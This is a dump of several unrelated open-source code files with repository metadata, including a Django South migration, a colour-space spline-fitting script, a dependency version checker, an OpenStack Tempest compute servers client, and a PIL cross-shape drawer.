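# assuming a connected `session` and a `users` table (both illustrative, not part of
# this module):
#     result = session.execute(
#         "INSERT INTO users (id, name) VALUES (1, 'alice') IF NOT EXISTS")
#     if result.was_applied:
#         ...  # the conditional insert took effect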
|
apache-2.0
| -163,086,977,530,493,200
| 39.937397
| 187
| 0.613633
| false
| 4.512803
| false
| false
| false
|
Lisaveta-K/lisaveta-k.github.io
|
_site/tomat/apps/shops/migrations/0006_transport_company_removal.py
|
1
|
3193
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'TransportCompany'
db.delete_table(u'shops_transportcompany')
def backwards(self, orm):
# Adding model 'TransportCompany'
db.create_table(u'shops_transportcompany', (
('is_visible', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal(u'shops', ['TransportCompany'])
models = {
u'shops.city': {
'Meta': {'object_name': 'City', 'db_table': "'shops_cities'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'shops.delivery': {
'Meta': {'object_name': 'Delivery'},
'caption': ('django.db.models.fields.TextField', [], {}),
'content': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'is_retail': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'is_wholesale': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'shops.discount': {
'Meta': {'object_name': 'Discount'},
'id': ('django.db.models.fields.PositiveIntegerField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'shops.shop': {
'Meta': {'object_name': 'Shop'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'city': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shops'", 'to': u"orm['shops.City']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'phones': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'point': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'worktime': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['shops']
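# A minimal sketch of applying this migration with South (the manage.py commands are
# standard South usage; the preceding migration number 0005 is assumed, not shown here):
#     python manage.py migrate shops          # forwards: drops shops_transportcompany
#     python manage.py migrate shops 0005     # backwards: recreates the table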
|
mit
| -2,002,103,304,827,569,700
| 50.516129
| 128
| 0.554964
| false
| 3.691329
| false
| false
| false
|
drhoet/marantz-hue-adapter
|
analysis/color_space_analysis.py
|
1
|
5469
|
import numpy as np
from mayavi import mlab
from scipy.interpolate import splprep, splev
from traits.api import HasTraits, Instance, Button, on_trait_change, Float
from traitsui.api import View, Item, HSplit, Group, VGroup
from mayavi.core.ui.api import MlabSceneModel, SceneEditor
################################################################################
# Remark: I used this script to find a good frequency -> xy values mapping. #
# I generated, as carefully as I could, all xy values the app would send to #
# the lamp. I did this by SLOOOOOOOWLY sliding through the slider, and #
# printing out all xy values I received, in order. I made 3 of those files, #
# which are ofc a bit different due to the speed I used not being constant, as #
# I'm not a robot. #
# I then used this script to find a good B-spline interpolation. On the screen #
# you can input a value for the smoothing factor s and recalculate + redraw #
# the interpolated function. I found a value of 0.001 for s to be good. #
# On the interpolated function, 411 equidistant samples are taken, one for #
# 0.05 frequency in the range 87.5 -> 108.00. #
# The xy values are then printed to the console. #
# #
# These values are copied in the colorspaces.py, since I didn't want to add #
# the dependency to scipy there. #
# #
# I executed this script in Enthought Canopy Version: 1.7.4.3348 (64 bit). #
# Required packages: #
# - numpy 1.10.4-1 #
# - mayavi 4.4.3-10 #
# - vtk 6.3.0-4 #
# - scipy 0.17.1-1 #
# - traits 4.5.0-1 #
# - traitsui 5.1.0-1 #
################################################################################
def read_file(filename):
linenb = 0
data = [[], [], []]
for line in open(filename, 'r'):
fields = line[1:-2].split(',')
data[0].append(linenb)
data[1].append(float(fields[0]))
data[2].append(float(fields[1]))
linenb = linenb + 1
return np.array(data)
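# A sketch of the capture-file format this parser expects (inferred from the slicing
# above; the actual testGO*.txt files are not included here): one bracketed x,y pair
# per line, e.g.
#     [0.4578,0.4101]
#     [0.4575,0.4099]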
class MyDialog(HasTraits):
p0 = read_file('testGO0.txt')
p1 = read_file('testGO1.txt')
p2 = read_file('testGO2.txt')
new_u = x = y = None
scene1 = Instance(MlabSceneModel, ())
scene2 = Instance(MlabSceneModel, ())
button1 = Button('Redraw')
button2 = Button('Redraw')
buttonSave = Button('Save')
s1 = Float
s2 = Float
@on_trait_change('button1')
def redraw_scene1(self):
self.redraw_scene(self.scene1, self.s1)
@on_trait_change('button2')
def redraw_scene2(self):
self.redraw_scene(self.scene2, self.s2)
@on_trait_change('buttonSave')
def save(self):
f = open('outputGO.txt', 'w')
f.write('freq = [\n')
for i in range(0, len(self.new_u)):
f.write(' [%s,%s],\n' % (self.x[i], self.y[i]))
f.write(']')
f.close()
def redraw_scene(self, scene, s):
mlab.clf(figure=scene.mayavi_scene)
mlab.plot3d(np.divide(self.p0[0], 100), self.p0[1], self.p0[2], tube_radius=0.005, color=(1, 0, 0), figure=scene.mayavi_scene)
mlab.plot3d(np.divide(self.p1[0], 100), self.p1[1], self.p1[2], tube_radius=0.005, color=(0, 1, 0), figure=scene.mayavi_scene)
mlab.plot3d(np.divide(self.p2[0], 100), self.p2[1], self.p2[2], tube_radius=0.005, color=(0, 0, 1), figure=scene.mayavi_scene)
tck, u = splprep([self.p1[1], self.p1[2]], u=np.linspace(87.50, 108.00, len(self.p1[0])), s=s, k=3)
self.new_u = np.linspace(87.50, 108.00, 411)
self.x, self.y = splev(self.new_u, tck, ext=2)
mlab.plot3d(np.divide(self.new_u, 100), self.x, self.y, tube_radius=0.005, color=(1, 1, 1), figure=scene.mayavi_scene)
# The layout of the dialog created
view = View(VGroup(
HSplit(
Group(
Item('scene1', editor=SceneEditor(), height=250,
width=300),
'button1',
's1',
show_labels=False,
),
Group(
Item('scene2',
editor=SceneEditor(), height=250,
width=300, show_label=False),
'button2',
's2',
show_labels=False,
)
),
'buttonSave',
show_labels=False
),
resizable=True,
)
m = MyDialog()
m.configure_traits()
|
mit
| 1,464,191,938,755,861,800
| 43.97479
| 134
| 0.449991
| false
| 3.829832
| false
| false
| false
|
mike-lawrence/actichampy
|
pycorder/loadlibs.py
|
1
|
3137
|
# -*- coding: utf-8 -*-
'''
Load required libraries and check versions
PyCorder ActiChamp Recorder
------------------------------------------------------------
Copyright (C) 2010, Brain Products GmbH, Gilching
PyCorder is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 3
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PyCorder. If not, see <http://www.gnu.org/licenses/>.
------------------------------------------------------------
@author: Norbert Hauser
@date: $Date: 2011-03-24 16:03:45 +0100 (Do, 24 Mrz 2011) $
@version: 1.0
B{Revision:} $LastChangedRevision: 62 $
'''
'''
------------------------------------------------------------
CHECK LIBRARY DEPENDENCIES
------------------------------------------------------------
'''
import sys
# required Python and library versions
ver_Python = "2.6"
ver_NumPy = ("1.3.0", "1.4.1")
ver_SciPy = ("0.7.1", "0.8.0")
ver_PyQt = ("4.5.2", "4.6.3")
ver_PyQwt = ("5.2.1",)
ver_lxml = ("2.2.4", "2.2.7")
# try to import python libraries, check versions
import_log = ""
if not ver_Python in sys.version:
import_log += "- Wrong Python version (%s), please install Python %s\r\n"%(sys.version, ver_Python)
try:
import numpy as np
if not np.__version__ in ver_NumPy:
import_log += "- Wrong NumPy version (%s), please install NumPy %s\r\n"%(np.__version__, ver_NumPy)
except ImportError:
import_log += "- NumPy missing, please install NumPy %s\r\n"%(str(ver_NumPy))
try:
import scipy as sc
if not sc.__version__ in ver_SciPy:
import_log += "- Wrong SciPy version (%s), please install SciPy %s\r\n"%(sc.__version__, ver_SciPy)
except ImportError:
import_log += "- SciPy missing, please install SciPy %s\r\n"%(str(ver_SciPy))
try:
from PyQt4 import Qt
if not Qt.QT_VERSION_STR in ver_PyQt:
import_log += "- Wrong PyQt version (%s), please install PyQt %s\r\n"%(Qt.QT_VERSION_STR, ver_PyQt)
except ImportError:
import_log += "- PyQt missing, please install PyQt %s\r\n"%(str(ver_PyQt))
try:
from PyQt4 import Qwt5 as Qwt
if not Qwt.QWT_VERSION_STR in ver_PyQwt:
import_log += "- Wrong PyQwt version (%s), please install PyQwt %s\r\n"%(Qwt.QWT_VERSION_STR, ver_PyQwt)
except ImportError:
import_log += "- PyQwt missing, please install PyQwt %s\r\n"%(str(ver_PyQwt))
try:
from lxml import etree
if not etree.__version__ in ver_lxml:
import_log += "- Wrong lxml version (%s), please install lxml %s\r\n"%(etree.__version__, ver_lxml)
except ImportError:
import_log += "- lxml missing, please install lxml %s\r\n"%(str(ver_lxml))
|
gpl-3.0
| -9,222,157,332,096,377,000
| 32.855556
| 113
| 0.601211
| false
| 3.362272
| false
| false
| false
|
ntymtsiv/tempest
|
tempest/services/compute/v3/json/servers_client.py
|
1
|
16454
|
# Copyright 2012 OpenStack Foundation
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# Copyright 2013 IBM Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import time
import urllib
from tempest.common.rest_client import RestClient
from tempest.common import waiters
from tempest import config
from tempest import exceptions
CONF = config.CONF
class ServersV3ClientJSON(RestClient):
def __init__(self, auth_provider):
super(ServersV3ClientJSON, self).__init__(auth_provider)
self.service = CONF.compute.catalog_v3_type
def create_server(self, name, image_ref, flavor_ref, **kwargs):
"""
Creates an instance of a server.
name (Required): The name of the server.
image_ref (Required): Reference to the image used to build the server.
flavor_ref (Required): The flavor used to build the server.
Following optional keyword arguments are accepted:
admin_password: Sets the initial root password.
key_name: Key name of keypair that was created earlier.
meta: A dictionary of values to be used as metadata.
security_groups: A list of security group dicts.
networks: A list of network dicts with UUID and fixed_ip.
user_data: User data for instance.
availability_zone: Availability zone in which to launch instance.
access_ip_v4: The IPv4 access address for the server.
access_ip_v6: The IPv6 access address for the server.
min_count: Count of minimum number of instances to launch.
max_count: Count of maximum number of instances to launch.
disk_config: Determines if user or admin controls disk configuration.
return_reservation_id: Enable/Disable the return of reservation id
"""
post_body = {
'name': name,
'image_ref': image_ref,
'flavor_ref': flavor_ref
}
for option in ['admin_password', 'key_name', 'networks',
('os-security-groups:security_groups',
'security_groups'),
('os-user-data:user_data', 'user_data'),
('os-availability-zone:availability_zone',
'availability_zone'),
('os-access-ips:access_ip_v4', 'access_ip_v4'),
('os-access-ips:access_ip_v6', 'access_ip_v6'),
('os-multiple-create:min_count', 'min_count'),
('os-multiple-create:max_count', 'max_count'),
('metadata', 'meta'),
('os-disk-config:disk_config', 'disk_config'),
('os-multiple-create:return_reservation_id',
'return_reservation_id')]:
if isinstance(option, tuple):
post_param = option[0]
key = option[1]
else:
post_param = option
key = option
value = kwargs.get(key)
if value is not None:
post_body[post_param] = value
post_body = json.dumps({'server': post_body})
resp, body = self.post('servers', post_body, self.headers)
body = json.loads(body)
# NOTE(maurosr): this deals with the case of multiple server create
# with return reservation id set True
if 'servers_reservation' in body:
return resp, body['servers_reservation']
return resp, body['server']
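    # A minimal usage sketch (auth_provider, image_ref and flavor_ref are illustrative
    # values, not defined in this module):
    #     client = ServersV3ClientJSON(auth_provider)
    #     resp, server = client.create_server('test-vm', image_ref, flavor_ref,
    #                                         key_name='my-keypair', min_count=1)
    #     client.wait_for_server_status(server['id'], 'ACTIVE')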
def update_server(self, server_id, name=None, meta=None, access_ip_v4=None,
access_ip_v6=None, disk_config=None):
"""
Updates the properties of an existing server.
server_id: The id of an existing server.
        name: The name of the server.
        meta: A dictionary of values to be used as metadata.
        access_ip_v4: The IPv4 access address for the server.
        access_ip_v6: The IPv6 access address for the server.
        disk_config: Determines if user or admin controls disk configuration.
"""
post_body = {}
if meta is not None:
post_body['metadata'] = meta
if name is not None:
post_body['name'] = name
if access_ip_v4 is not None:
post_body['os-access-ips:access_ip_v4'] = access_ip_v4
if access_ip_v6 is not None:
post_body['os-access-ips:access_ip_v6'] = access_ip_v6
if disk_config is not None:
post_body['os-disk-config:disk_config'] = disk_config
post_body = json.dumps({'server': post_body})
resp, body = self.put("servers/%s" % str(server_id),
post_body, self.headers)
body = json.loads(body)
return resp, body['server']
def get_server(self, server_id):
"""Returns the details of an existing server."""
resp, body = self.get("servers/%s" % str(server_id))
body = json.loads(body)
return resp, body['server']
def delete_server(self, server_id):
"""Deletes the given server."""
return self.delete("servers/%s" % str(server_id))
def list_servers(self, params=None):
"""Lists all servers for a user."""
url = 'servers'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
return resp, body
def list_servers_with_detail(self, params=None):
"""Lists all servers in detail for a user."""
url = 'servers/detail'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
return resp, body
def wait_for_server_status(self, server_id, status, extra_timeout=0,
raise_on_error=True):
"""Waits for a server to reach a given status."""
return waiters.wait_for_server_status(self, server_id, status,
extra_timeout=extra_timeout,
raise_on_error=raise_on_error)
def wait_for_server_termination(self, server_id, ignore_error=False):
"""Waits for server to reach termination."""
start_time = int(time.time())
while True:
try:
resp, body = self.get_server(server_id)
except exceptions.NotFound:
return
server_status = body['status']
if server_status == 'ERROR' and not ignore_error:
raise exceptions.BuildErrorException(server_id=server_id)
if int(time.time()) - start_time >= self.build_timeout:
raise exceptions.TimeoutException
time.sleep(self.build_interval)
def list_addresses(self, server_id):
"""Lists all addresses for a server."""
resp, body = self.get("servers/%s/ips" % str(server_id))
body = json.loads(body)
return resp, body['addresses']
def list_addresses_by_network(self, server_id, network_id):
"""Lists all addresses of a specific network type for a server."""
resp, body = self.get("servers/%s/ips/%s" %
(str(server_id), network_id))
body = json.loads(body)
return resp, body
def action(self, server_id, action_name, response_key, **kwargs):
post_body = json.dumps({action_name: kwargs})
resp, body = self.post('servers/%s/action' % str(server_id),
post_body, self.headers)
if response_key is not None:
body = json.loads(body)[response_key]
return resp, body
def create_backup(self, server_id, backup_type, rotation, name):
"""Backup a server instance."""
return self.action(server_id, "create_backup", None,
backup_type=backup_type,
rotation=rotation,
name=name)
def change_password(self, server_id, admin_password):
"""Changes the root password for the server."""
return self.action(server_id, 'change_password', None,
admin_password=admin_password)
def reboot(self, server_id, reboot_type):
"""Reboots a server."""
return self.action(server_id, 'reboot', None, type=reboot_type)
def rebuild(self, server_id, image_ref, **kwargs):
"""Rebuilds a server with a new image."""
kwargs['image_ref'] = image_ref
if 'disk_config' in kwargs:
kwargs['os-disk-config:disk_config'] = kwargs['disk_config']
del kwargs['disk_config']
return self.action(server_id, 'rebuild', 'server', **kwargs)
def resize(self, server_id, flavor_ref, **kwargs):
"""Changes the flavor of a server."""
kwargs['flavor_ref'] = flavor_ref
if 'disk_config' in kwargs:
kwargs['os-disk-config:disk_config'] = kwargs['disk_config']
del kwargs['disk_config']
return self.action(server_id, 'resize', None, **kwargs)
def confirm_resize(self, server_id, **kwargs):
"""Confirms the flavor change for a server."""
return self.action(server_id, 'confirm_resize', None, **kwargs)
def revert_resize(self, server_id, **kwargs):
"""Reverts a server back to its original flavor."""
return self.action(server_id, 'revert_resize', None, **kwargs)
def create_image(self, server_id, name, meta=None):
"""Creates an image of the original server."""
post_body = {
'create_image': {
'name': name,
}
}
if meta is not None:
post_body['create_image']['metadata'] = meta
post_body = json.dumps(post_body)
resp, body = self.post('servers/%s/action' % str(server_id),
post_body, self.headers)
return resp, body
def list_server_metadata(self, server_id):
resp, body = self.get("servers/%s/metadata" % str(server_id))
body = json.loads(body)
return resp, body['metadata']
def set_server_metadata(self, server_id, meta, no_metadata_field=False):
if no_metadata_field:
post_body = ""
else:
post_body = json.dumps({'metadata': meta})
resp, body = self.put('servers/%s/metadata' % str(server_id),
post_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def update_server_metadata(self, server_id, meta):
post_body = json.dumps({'metadata': meta})
resp, body = self.post('servers/%s/metadata' % str(server_id),
post_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def get_server_metadata_item(self, server_id, key):
resp, body = self.get("servers/%s/metadata/%s" % (str(server_id), key))
body = json.loads(body)
return resp, body['metadata']
def set_server_metadata_item(self, server_id, key, meta):
post_body = json.dumps({'metadata': meta})
resp, body = self.put('servers/%s/metadata/%s' % (str(server_id), key),
post_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def delete_server_metadata_item(self, server_id, key):
resp, body = self.delete("servers/%s/metadata/%s" %
(str(server_id), key))
return resp, body
def stop(self, server_id, **kwargs):
return self.action(server_id, 'stop', None, **kwargs)
def start(self, server_id, **kwargs):
return self.action(server_id, 'start', None, **kwargs)
def attach_volume(self, server_id, volume_id, device='/dev/vdz'):
"""Attaches a volume to a server instance."""
return self.action(server_id, 'attach', None, volume_id=volume_id,
device=device)
def detach_volume(self, server_id, volume_id):
"""Detaches a volume from a server instance."""
return self.action(server_id, 'detach', None, volume_id=volume_id)
def live_migrate_server(self, server_id, dest_host, use_block_migration):
"""This should be called with administrator privileges ."""
migrate_params = {
"disk_over_commit": False,
"block_migration": use_block_migration,
"host": dest_host
}
req_body = json.dumps({'migrate_live': migrate_params})
resp, body = self.post("servers/%s/action" % str(server_id),
req_body, self.headers)
return resp, body
def migrate_server(self, server_id, **kwargs):
"""Migrates a server to a new host."""
return self.action(server_id, 'migrate', None, **kwargs)
def lock_server(self, server_id, **kwargs):
"""Locks the given server."""
return self.action(server_id, 'lock', None, **kwargs)
def unlock_server(self, server_id, **kwargs):
"""UNlocks the given server."""
return self.action(server_id, 'unlock', None, **kwargs)
def suspend_server(self, server_id, **kwargs):
"""Suspends the provided server."""
return self.action(server_id, 'suspend', None, **kwargs)
def resume_server(self, server_id, **kwargs):
"""Un-suspends the provided server."""
return self.action(server_id, 'resume', None, **kwargs)
def pause_server(self, server_id, **kwargs):
"""Pauses the provided server."""
return self.action(server_id, 'pause', None, **kwargs)
def unpause_server(self, server_id, **kwargs):
"""Un-pauses the provided server."""
return self.action(server_id, 'unpause', None, **kwargs)
def reset_state(self, server_id, state='error'):
"""Resets the state of a server to active/error."""
return self.action(server_id, 'reset_state', None, state=state)
def shelve_server(self, server_id, **kwargs):
"""Shelves the provided server."""
return self.action(server_id, 'shelve', None, **kwargs)
def unshelve_server(self, server_id, **kwargs):
"""Un-shelves the provided server."""
return self.action(server_id, 'unshelve', None, **kwargs)
def get_console_output(self, server_id, length):
return self.action(server_id, 'get_console_output', 'output',
length=length)
def rescue_server(self, server_id, **kwargs):
"""Rescue the provided server."""
return self.action(server_id, 'rescue', None, **kwargs)
def unrescue_server(self, server_id):
"""Unrescue the provided server."""
return self.action(server_id, 'unrescue', None)
def get_server_diagnostics(self, server_id):
"""Get the usage data for a server."""
resp, body = self.get("servers/%s/os-server-diagnostics" %
str(server_id))
return resp, json.loads(body)
def list_instance_actions(self, server_id):
"""List the provided server action."""
resp, body = self.get("servers/%s/os-instance-actions" %
str(server_id))
body = json.loads(body)
return resp, body['instance_actions']
def get_instance_action(self, server_id, request_id):
"""Returns the action details of the provided server."""
resp, body = self.get("servers/%s/os-instance-actions/%s" %
(str(server_id), str(request_id)))
body = json.loads(body)
return resp, body['instance_action']
def force_delete_server(self, server_id, **kwargs):
"""Force delete a server."""
return self.action(server_id, 'force_delete', None, **kwargs)
def restore_soft_deleted_server(self, server_id, **kwargs):
"""Restore a soft-deleted server."""
return self.action(server_id, 'restore', None, **kwargs)
|
apache-2.0
| 5,713,543,314,471,721,000
| 39.034063
| 79
| 0.581682
| false
| 3.99272
| true
| false
| false
|
FlintHill/SUAS-Competition
|
UpdatedSyntheticDataset/SyntheticDataset2/ElementsCreator/cross.py
|
1
|
1798
|
from PIL import ImageDraw, Image
from SyntheticDataset2.ElementsCreator import Shape
class Cross(Shape):
def __init__(self, height, color, rotation):
"""
Initialize a Cross shape
:param height: height in pixels
:type height: int
:param color: color of shape - RGB
:type color: 3-tuple int
:param rotation: degrees counterclockwise shape will be rotated
:type rotation: int
"""
super(Cross, self).__init__(color, rotation)
self.height = height
self.coordinates = self.get_coordinates()
def get_coordinates(self):
"""
        :return: drawing coordinates for the shape
        :rtype: list of 2-tuple xy pixel coordinates
"""
x1 = self.height/3
y1 = 0
x2 = 2*self.height/3
y2 = 0
x3 = 2*self.height/3
y3 = self.height/3
x4 = self.height
y4 = self.height/3
x5 = self.height
y5 = 2*self.height/3
x6 = 2*self.height/3
y6 = 2*self.height/3
x7 = 2*self.height/3
y7 = self.height
x8 = self.height/3
y8 = self.height
x9 = self.height/3
y9 = 2*self.height/3
x10 = 0
y10 = 2*self.height/3
x11 = 0
y11 = self.height/3
x12 = self.height/3
y12 = self.height/3
return [(x1,y1),(x2,y2),(x3,y3),(x4,y4),(x5,y5),(x6,y6),(x7,y7),(x8,y8),(x9,y9),(x10,y10),(x11,y11),(x12,y12)]
def draw(self):
new_cross = Image.new('RGBA', (self.height,self.height), color=(255,255,255,0))
draw = ImageDraw.Draw(new_cross)
draw.polygon(self.coordinates, fill=self.color)
new_cross = new_cross.rotate(self.rotation, expand=1)
return new_cross
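# A minimal usage sketch; the output path is illustrative, and the Shape base class is
# assumed to be importable exactly as at the top of this file:
if __name__ == "__main__":
    cross = Cross(height=90, color=(255, 0, 0), rotation=45)
    image = cross.draw()
    image.save("cross_example.png")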
|
mit
| 8,255,110,933,483,183,000
| 29.474576
| 118
| 0.560623
| false
| 3.354478
| false
| false
| false
|